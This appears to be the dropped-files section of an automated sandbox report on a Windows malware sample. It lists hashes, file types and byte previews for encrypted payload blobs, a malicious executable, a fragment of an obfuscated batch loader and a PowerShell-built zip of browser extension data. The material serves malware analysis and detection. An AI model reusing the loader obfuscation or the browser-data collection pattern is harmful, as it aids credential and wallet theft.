                                                                                            Preview:2023/10/05-07:18:01.846 19a0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2023/10/05-07:18:01.871 19a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

                                                                                            C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):41
                                                                                            Entropy (8bit):4.704993772857998
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                            Malicious:false
                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                            C:\Users\user\AppData\Local\Temp\Artistic

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:DOS executable (COM, 0x8C-variant)
                                                                                            Category:dropped
                                                                                            Size (bytes):737280
                                                                                            Entropy (8bit):7.999727342265165
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:h5CRlmFSXGB+TSX9v2Ub8eS08hc9JDTTkL3+4Xymvs0w5uXc6RYGOTvEgdgLU:uMo4QSN+ES080H23fipuXc6VOjuLU
                                                                                            MD5:D35007CC8B2860B1FE9EE861E1F2846D
                                                                                            SHA1:58638FD185601506B3B13FE254065AEB7EDFF28C
                                                                                            SHA-256:DE1E4DBE18F0B926B49ACEB10157BC7F542409BAD6242422EFEF3B831608A037
                                                                                            SHA-512:45F851201656CB19C89274D124A7625A4C9FE12F412616A84458AA1857C61455126264416FF7FA1C9FFA99B994613BAECFACD1F8179240A5021C7E5B867EA068
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:..V.Wa.A&..~.O........*.qF..<<.O...K.....*Rh..?x...=..d..d.6w.5.*...W.....`...i...cC.............~..EnB.L.8...3.lmB.....&w.eb.....t.g3......i26../K!..t.z.:..b..t..".H.Q.9O.c.....NP.......;.G.[.....,_.&o...Mf/..#zM.].C..S.#G.?..5f......m...|Q..S\.|ks..x.....I^..ov...f..-.....)..x.|.X?..g1...r./......V.W...=q{..F.T`...&.....E..OmX.....o...0..j]M......U.........k..6.....,4p.~Z......9..c.e....S.....5...:..-.b...IWd.`....t.">.9..G'v...F....H..!........+^...G..M}.._..I...~n.tJ[.p...m...../.....x.d......w7....Z).wv..t..U..L...Bf..|..;....h]CV .......5.8b`.w.....5.S=....v....#.J*..9.!z..8O..P.....j....z.....K;....q7@LG.\.<.......x...w./T.d..!.G..\#.....`.....b....i...~3,.......L..?...VuXNR..3.[._.....(.nH.$..4.?..-...z.L3......D^R`~...{d.:.{.2c.Bj....z*.w.i.....7..V...+.g../....4...N.oe.TVb......I...x.sh....\. .....?.3X..`]G..[.fP.#;..GI.{.r.1...j..d........\^#..P.u.1....n..Q2.4!.S..........`..{D.P..6.-$..B..v).../...h.....\C...U..

                                                                                            C:\Users\user\AppData\Local\Temp\Audit

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:ASCII text, with very long lines (677), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):14583
                                                                                            Entropy (8bit):5.147734083982425
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Wz6fxVoipam62OZ6gDUrE4Tp9TQIFQFwAm:kSf3pF62OZHI44NVeFS
                                                                                            MD5:9DA23439E34B0498B82AE193C5A8F3A8
                                                                                            SHA1:AE20BBE7FAC03C94E42F4DD206D89003FAAE7899
                                                                                            SHA-256:0F241CC0324871A1A900A7AC0EDF889A8D12875B1072F44856CC979A4B7A77AC
                                                                                            SHA-512:CD4B262753B4F5F1DAC09C20FA64EBDEE00CF4A3FCE92287A7439DF943EA65BDF8569F541C2668B2164139B91FACCCFB3C98DB8AD8F686637F4E317583CC98A2
                                                                                            Malicious:false
                                                                                            Preview:Set Amount=5..QBNRoutes-Clicks-..eTHomework-Ups-Slight-Suspension-Partially-Additionally-Subsequent-..InSSurfing-Pn-Chi-Cooked-Mainstream-Collaborative-Morocco-..wPDiagnostic-Nr-Limitations-Medicine-Graphics-Tracking-Sheep-Anderson-Stakeholders-..bFXcGenerates-Joan-Menu-Literary-Wallpaper-Exam-Seasons-..HtMilitary-..SnJOutsourcing-Accessibility-Minus-Disk-Bw-Instructions-Invited-..SvqHometown-Band-Counted-Schema-Starts-Seek-Blank-Pages-..QGbSummary-Janet-Fatal-Fire-Com-..Set Tokyo=l..QpOut-Eye-Copied-Wto-Prescribed-Turbo-Narrow-..gwbOutcome-Examination-Pix-..aWCDip-Serving-..FZAcre-Satellite-Grade-..uXfDegree-Olympics-..ltCSLimited-Combo-Stanford-Disorder-Rank-Cannon-Veterans-Come-Hindu-..hrSolving-Encounter-None-Xanax-Hosts-..QeLVWaste-Joseph-Barbie-Applies-Lenses-..RqEra-Ears-Stone-..Set Degree=r..RPtAttend-Attribute-Tires-Ti-Rep-Genome-..JDpPenn-Prep-Scuba-Millennium-Probe-Herb-Underlying-..mwmdUndertake-Bosnia-Ministries-Dutch-Official-Designs-Accuracy-..HDoWebster-Atom-Rf-Topless-

                                                                                            C:\Users\user\AppData\Local\Temp\Audit.cmd

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:ASCII text, with very long lines (677), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):14583
                                                                                            Entropy (8bit):5.147734083982425
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Wz6fxVoipam62OZ6gDUrE4Tp9TQIFQFwAm:kSf3pF62OZHI44NVeFS
                                                                                            MD5:9DA23439E34B0498B82AE193C5A8F3A8
                                                                                            SHA1:AE20BBE7FAC03C94E42F4DD206D89003FAAE7899
                                                                                            SHA-256:0F241CC0324871A1A900A7AC0EDF889A8D12875B1072F44856CC979A4B7A77AC
                                                                                            SHA-512:CD4B262753B4F5F1DAC09C20FA64EBDEE00CF4A3FCE92287A7439DF943EA65BDF8569F541C2668B2164139B91FACCCFB3C98DB8AD8F686637F4E317583CC98A2
                                                                                            Malicious:false
                                                                                            Preview:Set Amount=5..QBNRoutes-Clicks-..eTHomework-Ups-Slight-Suspension-Partially-Additionally-Subsequent-..InSSurfing-Pn-Chi-Cooked-Mainstream-Collaborative-Morocco-..wPDiagnostic-Nr-Limitations-Medicine-Graphics-Tracking-Sheep-Anderson-Stakeholders-..bFXcGenerates-Joan-Menu-Literary-Wallpaper-Exam-Seasons-..HtMilitary-..SnJOutsourcing-Accessibility-Minus-Disk-Bw-Instructions-Invited-..SvqHometown-Band-Counted-Schema-Starts-Seek-Blank-Pages-..QGbSummary-Janet-Fatal-Fire-Com-..Set Tokyo=l..QpOut-Eye-Copied-Wto-Prescribed-Turbo-Narrow-..gwbOutcome-Examination-Pix-..aWCDip-Serving-..FZAcre-Satellite-Grade-..uXfDegree-Olympics-..ltCSLimited-Combo-Stanford-Disorder-Rank-Cannon-Veterans-Come-Hindu-..hrSolving-Encounter-None-Xanax-Hosts-..QeLVWaste-Joseph-Barbie-Applies-Lenses-..RqEra-Ears-Stone-..Set Degree=r..RPtAttend-Attribute-Tires-Ti-Rep-Genome-..JDpPenn-Prep-Scuba-Millennium-Probe-Herb-Underlying-..mwmdUndertake-Bosnia-Ministries-Dutch-Official-Designs-Accuracy-..HDoWebster-Atom-Rf-Topless-

                                                                                            C:\Users\user\AppData\Local\Temp\Commissioner

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\Dentists

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):936960
                                                                                            Entropy (8bit):7.999787839838031
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:YUAtmMemaEnWBr7IggzgA28HTzdyF+Tudc0:0tBzWZIPgOzzoF+TAc0
                                                                                            MD5:895C5374A042A9E6C78C673690CD2275
                                                                                            SHA1:9DFE1B532F958F678DE2BAC7C74646E007A8FA14
                                                                                            SHA-256:226099AAC21E8D4A671A68B37D204339703FB696B6CC5AA30311FB55D6AB2147
                                                                                            SHA-512:130AF34BB1D12DB8E86B930D8E490754687E1381A0104AC4C98CC2F02FF7FC4ED9E1D549121A013E1C32663A00D1DC8EB20D2F9831FEB3C7EB17BF61A1D8D52C
                                                                                            Malicious:false
                                                                                            Preview:.*.;........<$D.\..n.X...o.V*N...s:1.p.(0:.4.8C.w.t..j$.....^o.1.,.....7X=.BM.a,f.`..}xOv...:l..M...z.d..<,U.\.?ZU...S..zs.....l..J.U..{nQ.@K..,{...R._.oX.2."k.P.R...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...PkA...p...G................@.......@......kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E.......\S..i=.#\In>3(..?....d..?..B-...@...s...@......m...........5...x..2).U.j....r>.,#.~.|.b.x...<#hg..|.D.... ..z.{F..P(G.......u.P...j_qC....X....&..KT.|.!.P.is.y.+.....V..42m#NM.9.R.5...W....C.S..(J H-..^..z.P.Y....L....N....{....C.T8u7...p.......J..~..S.0y(._2~........=..$.n5O..^h......6P...66>...=......o.X.........Z.Y>Q..../6.t-3.....`.:.......d....s....u.......X...=.9[...."... 5

                                                                                            C:\Users\user\AppData\Local\Temp\Disturbed

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):924672
                                                                                            Entropy (8bit):7.9997815054278165
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:BRDoeVqsqRauiMlgvR/scK1gE6dN3196sJVKmcp9oxSpeYCWi+INv1QH:BRDoeV7+auZwkcKuE6dN9UuSHCWi+I2
                                                                                            MD5:0E2DF9A4F4D78AD0299F0377D417B39E
                                                                                            SHA1:A2452AB3B04B480DFC2A58A416762E280254751F
                                                                                            SHA-256:8834F63F09734B9F284437F26CBA4909CE9AE1ACEAFA27E2BCD7531C1A7479DF
                                                                                            SHA-512:D8194F24CC02FC030C7CF1DAB5970257A79B8BCC887A8FF1CCD104E94EA809DCD266B056C80E6A0E73CBA71F81E654389025C939E3135F6FAFCA9D51737812B8
                                                                                            Malicious:false
                                                                                            Preview:Z#i....m.4o....Z......z...F...+ G.Z.K.'w.....gp....OeVD....c.$.z.L........g...,n../.S..n..=..Q_:..3........B..!...2{...1..2.;.5....W...gO...r*..w.k...D..o..8...._..>...-...T>..G3.>......|.2.1<.P..!gru.Z...!.V.Knd...pS.....3..y....N..|.........wkCy@..@.....2G..NW..(..7=O.....[.y\.L...k...8$4...s!n.O3.D..D.*..kM..T=.t..$.j..?...tm.YL..cp.H...o...@...5.j...>dt.#2V...mC.!.....W..j..Z.GL..Z$.....SGKt"..q..3.........H..h..7...).......&..9..QC..E_Y...6.!.k...b....7..5......6Z./q.._.a.}..>.&ZO.y.4...n.jE.4.'.".nC.5..O.)r...v.!.(.[6N.J....vv...e.0..x..C.............^].m...q.,..q.... /.x..j.9{(K........."..1Ul.|.f....!:.(...`?...z..aQ.om.K.yR.....A...W...K.... *..W...J|7..4.C...1..S._.I......h....sM...I.....`Wp..'.X.#.,40y8.B..;.`...R......F...o....Q...{.s..w2Lqq./9...N..b......../BZy.....O......Mh...........%.V}..q..HnA..Y{Q\!.o_. LEc..."...'..S03.E1.h*....^.........Kr.{#t.>...v...a.....a.:......F...p.G....q.Y.9..JJ...o.x.....at.<dgTW

                                                                                            C:\Users\user\AppData\Local\Temp\Flavor

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):608256
                                                                                            Entropy (8bit):7.999697266277862
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:Kjt154JaagocQMXyhq6csxBzOikOQm8uDfFQkcSUxYw16p:ut15vxocQMXyhdx5mBm8ueBBY1
                                                                                            MD5:D9182F7A263F19B9876E7E1568E6C760
                                                                                            SHA1:D0683B5A7247A2F4A69473165D2C2649F2E1C01F
                                                                                            SHA-256:4EFFF79E94F136F9BBAED62501810937785831B8C10EE9EB675CEAE24CF3C4C9
                                                                                            SHA-512:85582B94DA822580EB26BC477440D87FB0A9ED98E3B75166CD96C2A18C88367C8BDD808FC43C52C2078E625EFD81983E9F2E733272289833700649AD58A96A9B
                                                                                            Malicious:false
                                                                                            Preview:.....39...eV\..D...W.....b..N-H....%.D..3*<'"..8......u....B/Pu..'....aRv.vy.....s.`..Q.pm+.'7.....o......k...(..<...1.....Fv.."...v$..h.....E..v=v.A..bK7=.....$.Q..5...A...._.$Ie7d../..|..Sk..j.C..0Y..Fzu.5.....{u.....0q.g..-.x.....Q....k....+.y.:HH.x.....H......A..\..K.".6.l;...].5......4....:....}...8jK#iX.......s...9...Ck...'..P.6..9...b.m.vVZ[dSmV..*b..!.\:...[+.w...p.e..w.....a.q.......I.E...:.},r...L..6.........n..8...v?...5@.j..~....s.F+....P .T.....=8.......L.r5.........bFJ....H..]....C.....BY..S.?W..'..)..m.. ,........k......d..Or....2.K.-.p.j..h.R..?y.../.v.t...K.....J.l.Id.q|...$&_8.7i....F.".Zg...3....@y..X....m..[Y..4..6.;t.../.N........F.g.AT.J.c4'.......g....:A._0.}.b.......Sy..nU.......Lp.dG.9....5.?.h..].W...o...F."...X.?..=.kk2.....W...B...o2..'.......b.oeR...U.....`...Z......c._......`R].9..{.`,1..{...>[.....p.#....W.<....1..s(...U-:i9...F;.KR......Q.A.?.Aq...KaI.....,..O....:..r.h...Z..........B..W........a[G

                                                                                            C:\Users\user\AppData\Local\Temp\Justice

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:PGP Secret Sub-key -
                                                                                            Category:dropped
                                                                                            Size (bytes):868352
                                                                                            Entropy (8bit):7.999826895647566
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:f68TS0M+n1WeB4MhCL3bhz0IGmcv21Z/B3U54K:f/TZMa1WCq3bBTceXBEX
                                                                                            MD5:774DF02C553D130DDE3AA7496B64EBED
                                                                                            SHA1:E2A4AAB8C3B654BD022662045FA70413A80E55F9
                                                                                            SHA-256:AE9283C1A14B751639A75592295D85105954B761737AB77FC1E667A1498F2E9E
                                                                                            SHA-512:C132CDF383E4FA32362D50768898ED9C6CD1E306056D066168A8AC1EE3EA7953424FF3B241FF1E0376B99B91F566B698BFEF07DA9BC45471097A6637DC154D11
                                                                                            Malicious:false
                                                                                            Preview:.4.`.../v..] ....i.t%....f,)..K....y.K.c]..$.%..YK..2I.]E.bv..r.Ke.d.....U...,.........q.1@...p.n=..j.%....3..x..y...TW...*C.i..^j..J........`...K}k]..|..'>...c../.\j@...g'....B..|..2r.F>~./+..{.x.A.a.......U.|....W.4...B`5...EX-3@.d..W-.... ..)e5..%......7`.m.t.l.L.M......;F.]..}..g.NR...\.....~+!n.d.*............v.}...H.....'.D..I.9.R^.|.X^..0@...."+.]...)j........MBi.Y.m_t....H..|$<.....v...p.}.......R8l.5M....'..W..D..xaNC......l).R..'o7.ue.x..".Ni..po..M.0..N.W..=......k.=3'J..@>..\.P..K.W Z..1M..zU..}...........8.M.D..G..?..E/k.QK.e..D..R..T|v.dQ0.L..}..........aJiJ..0......^m.Z.<..f..........g..$yC..~..~...+._}............z.'.....R.6}..HfG..mU..9;2..9...Vn).Q..h5a.:..x$=...+._.|x.ye.m .0.....[...v..TN.?.v,~F....8?.I"^...q!:.^.B..M..dY...!..Y...FH..g5.. .b...............i.T.U'j..P.....t.r.D.NR..1V.[C..:...N..../.QJ.fRg&.S|..q...5.!1..@....7...ONI2...w<+Q.@4..$..^O.1...}.On.....C.K.{.<.......O.........7kJ.(...{..*Eb........n..5.......

                                                                                            C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):2251
                                                                                            Entropy (8bit):5.979056697454795
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:9lOXSntwOXbYOXBOXMCw96OIOX/QUtyFyGfyX7ywKutijvG9svyWQkOXIGOX7OXH:XOXQwOXEOXBOXMCq6jOX/QYtijvZpQkI
                                                                                            MD5:F284902AA251116239327020C934B024
                                                                                            SHA1:038CEF1C5D434AAC14EE205A03D70BAB9B9ED3EE
                                                                                            SHA-256:78999281E149E0A7105092F5629003E093190EDA3F865C1AEBCA65F538559576
                                                                                            SHA-512:AD278CF627317193D1781B91BE1CFED5102AC2AA4138B1E344B357761CD54515070DD6B5B9736293AF5B78CE084D4AF1B7DBE1FFF6E7ED288D151654B377BEE4
                                                                                            Malicious:false
                                                                                            Preview:PK..........EW....*...1...2...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log[..PU......@4#WJ~r.K~nbf..................PK..........EW.r........./...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.u..ts...5..C..PK..........EW............,...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCKPK..........EW.}X.....o...+...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.;..0.D{N...8F H.. $...q.....(6..C...n4O.'..F.../&.....r4.\..6..%....D.<6^!.K....u..V...S+f.P.e..v(tk..}w.C.....e.....+S....ou.X..uD..+o..o.@....Ce...AO.......-...n.\.......}.&..PK..........EW..P{+...)...7...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.Z....#.TNjYjNJ..SeIjyfq.s~nAbQbI~...3....PK........@.EW............0...Edge\jdiccldimpdaibmpdkjnbmckianbfold\000003.logPK........@.EW.r.........-...Edge\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT.u..ts...5..C..PK........@.EW............*...Edge\jdiccldimpdaibmpdkjnbmckianbfold\LOCKPK........@.EW"4v....s...)...Edge\jdiccldimpdaibmpdkjnbmckianbfold\LOG.;..0.D{N....

                                                                                            C:\Users\user\AppData\Local\Temp\Proceeds

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):873472
                                                                                            Entropy (8bit):7.999771421012599
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:pVSjpPwfTXXzpNAlKtl5D0M4ha4cSaeeK+1J4SZ+dC+ae:pVSjp0zpNQKtEVySaK05Z0ae
                                                                                            MD5:DE061B898E12D89C92409F220918347F
                                                                                            SHA1:6B571EDAB30DCC4D5518E5BEBB296D1F7BF5414C
                                                                                            SHA-256:70FDA66F3EA2607D6CFF63D0A6A7258577690D2A9BC5105BB529889CE025D1C2
                                                                                            SHA-512:61D94F04572643DC4274AEDDA51E7CB6BCCCEFCFA4556E6D87F94195DDF90FFBEB65909688C7BC3407F244021CC6DFF0C8692FD7835EE61E6A43A0394A693A2B
                                                                                            Malicious:false
                                                                                            Preview:.d.M.l..!..&>....j!.}.........V...K..F.c%WOX..sH.A%[6. .`.2Q.'..J....M.A......8;....m...J.m......0.N.}...DoE.^......m....a..H.1,.h.....b%l..@\.mhrf.5..FS...[l;.~S...B.J...0..a...k+.;...YH.....[...Rw.n..........L...<..SA.'...v...H^9....0.O..cq*...f7.J....?...a..b[..A7c a..p..L".......o-z.....H.K..<q..JO..G.2........F OX.%S..^.qF6.$.nTU.B..+=.?U... K.S..[....\.}..U+.......s....u......T..VC.d...s..3]..U}8..u..........sG|..9.37.#..}...[.-....a..U6....F.v.m.Y#...C4=Oo..a...-.0.\;.`....../.s%.$...Y.ev.y....T........klrD......r.#JO9c>..H....ub.W..W...X.}g...(..u..Y..}.....C..D.K.....WC..[$...Mr.......jP\K....(>.b.G.?cQ`x.(..4`....<..._.(j.I.|.t.ax.>.Z..Sw4..W.!t. ..?A.........U.Q..C.)p...3..lz.~..uJac.[.(......%....lI...y....H...,..... LJ.....s....Y._....+1......<7..Z(.,.%.e0.....L. `</.....>.q.Z"..OpIYqG.....i}..J...^.&O0.Q..t.t.#.....5.c......n$.7..$...x..3..p$.6..@..}%.Z8.M...^...q..r.8}.r.'.s`9.K.F.,Y.@..!.#zo*Xm...1.`.0.......{.C...

                                                                                            C:\Users\user\AppData\Local\Temp\Revenue

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:MPEG-4 LOAS
                                                                                            Category:dropped
                                                                                            Size (bytes):406505
                                                                                            Entropy (8bit):7.9995378716562975
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:V3Jv3CNTu77LbJT98bIqqn6mw7TzoxsGFVdiJDQLCsK:V3kNTu77xqIlgztgMMCB
                                                                                            MD5:AABC90B85B9C3B51543DE0339D29778E
                                                                                            SHA1:299F5E2CA9326E0A5FEEFB4FC7B05DA93CFD11A1
                                                                                            SHA-256:9A0A3567F4C9B9CA46FBF41D65CDD5CE464B0EFE42D6AAF7CFF840ADDBE05D60
                                                                                            SHA-512:3D951489D7D46874909BFD82E9CAC346BDD15BBB485FC76E1ED7D6FE7BB51A7649D1F649B75BB6F6F1B6F10EA16113CD01C20AA7EA85D038FCB7FE317082EDF3
                                                                                            Malicious:false
                                                                                            Preview:V.{rSYVs<6.4.../....b......Q..-.{....Xs}#..;...k.TF.Nx.?rqa~].o...P...r...t..1..7..~.s......."....r....V..:qq....Y.U:.....`9.%..(.....Zb.^.f%-..........lp?..6.@.....e'.X...U.P[..]..|.n...d&....9)...L..D.^.$Jw......+.+.....=<.jU......q..I./....G3...>23..........:..J.2..d..*V..Y..2.;..iqZ..$.h.9.....{....U!..'[`A".b..(.>FT7.M....Z.Y...u.....].8...X.<..{......w.o'.......s_.....`.!..)#./..a.icz1..u...]a.`S.H.p..R./`.b.q4 ......g]M.^..].......f.Z.n...YO7c..l........7!...r..k)P{.Sgw.>..gg...39.V...b.9...q.S..pC....a....|....j..2....aq-?14|..X!d.G..s3..<]*;v...L8.vGK....=..%cy.X.E..:@.,....q.z..~.c3...h6.......mQ...r.".(...o#.J.~..."$V...5A.cO.7W:...j.U....r . +r.1J..$(".*.DvYUDf;%C+...I.WQ`.d....|....>.E_.{......-.......1..?..+[..f...9.........."3....y%...s.....}[......mzo.&.W...?... ..:..x.gby....G....)........e.`..x....~....>^z.94..i.V.^.5..N.vs#...qI.~../.`m.l\_..ae*.V~"......fZ.ul{..9B..f...CP.\...cm..;.8y..N.$.h..i....4c;5j.>=....sc..'.D...|...

                                                                                            C:\Users\user\AppData\Local\Temp\Soundtrack

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):595968
                                                                                            Entropy (8bit):7.999664585177167
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:znvWu2yGE57zChjCiNP2kaw7L2CO43zeULJgSegv+3:zvWuWEYJCiNRaMLjOg5hk
                                                                                            MD5:B75737C804CA9949CC63BD42C945A5E6
                                                                                            SHA1:75C0490174ADC40D1824B1024021B82DD5C762B7
                                                                                            SHA-256:628068EE856D68776D6E9B755CD42D7A5A46AF1A2A6A2C22E65DB95B5D2D8F2C
                                                                                            SHA-512:58FEDD2BD6318D4B93DE429D184701E059321C16872CAFC978837C29985404BF432E4A2701894F7F67045F9684DA40C8E14F9F557DA3398C5D6EECA2E18FACA7
                                                                                            Malicious:false
                                                                                            Preview:.i.....@xl..o9.j.o](.....C<bu^...z..n|.,p..tA..3...<".T.Yy".....T._..-R...m.-T..=@..([y...U{W._...^U.Z.-.W.V.fBf.u&..Xg.{.J.......'T..M^....c..<..s.%&]..#..$e....m.(....7...U..Y8.Va.....&. .Q..._....+..r.....C%....;...0..t..`0..V..|...|i...xa9t..PM..Zi8.#q.5....}z.[...D,.^+|.....KA..P..e})$x.y...$q...i...-..-Gs.d.M.n....WJ..?..n.c....YE.6E..dHj..B.G-.4.=RB..0......1..j..s5A,&.[.#}...k...........J...X..O]<.8.~-.~...!.>V..[..*.X..G]...>...@..@.n.....?..R..,.^z......v8.Mj..rz...M-.!.#,.<.M.....H..}T.e=M).!z.\s...5........Xg..iE....".x..RNHQ....;..*...H.d+....&....C..0m`...v...G.Y.....|.N....K.^~......l.9I<..D....x.i..;%Y.k....Q?E.<P.||.\.o.t.......~.T..$\.....3.^(..'...~..!?+X..+A`$............4$.6l"<..;..C&.....^v..q.....%>v..%.&>.:;.....$N.GUY:dp.....G..........O.....Y,..u.-rJ[...w, I..:"..\x.U.V....G.k3....YvIS....|W..Cq.....i2..~Z......K..i.h..\..v..>:.o....?v...P..f.FBU.._...L..k#....7..tY......n....cj9.i..>\...W<.'<G.w'-o..'.......w5].....C.0C?

                                                                                            C:\Users\user\AppData\Local\Temp\Zip

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):636928
                                                                                            Entropy (8bit):7.9997148905138085
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:fytPG4+i8Y7x5DchRadzDV1Xp1vzXB8zQAOna+8:fa3T8YH4Rk1/iQAOS
                                                                                            MD5:84F05DDDEFB1C72567827BE553FE67FE
                                                                                            SHA1:C2EBCC4DE3439A8206AA8FAAC90312BFB207CE4F
                                                                                            SHA-256:B7DE8D92196F323EB9A6237B9E902461569FD093B36E1988DEE9DE2AB157BB12
                                                                                            SHA-512:99954FA07FE7CC0E54DBD0AF09B32507CD998C8B44CB63F1FFE8E30667B6D1BB0949A6C95B60E40E73F0B0BB3F11E79F8FA23F696032118210CD10F03EEC2904
                                                                                            Malicious:false
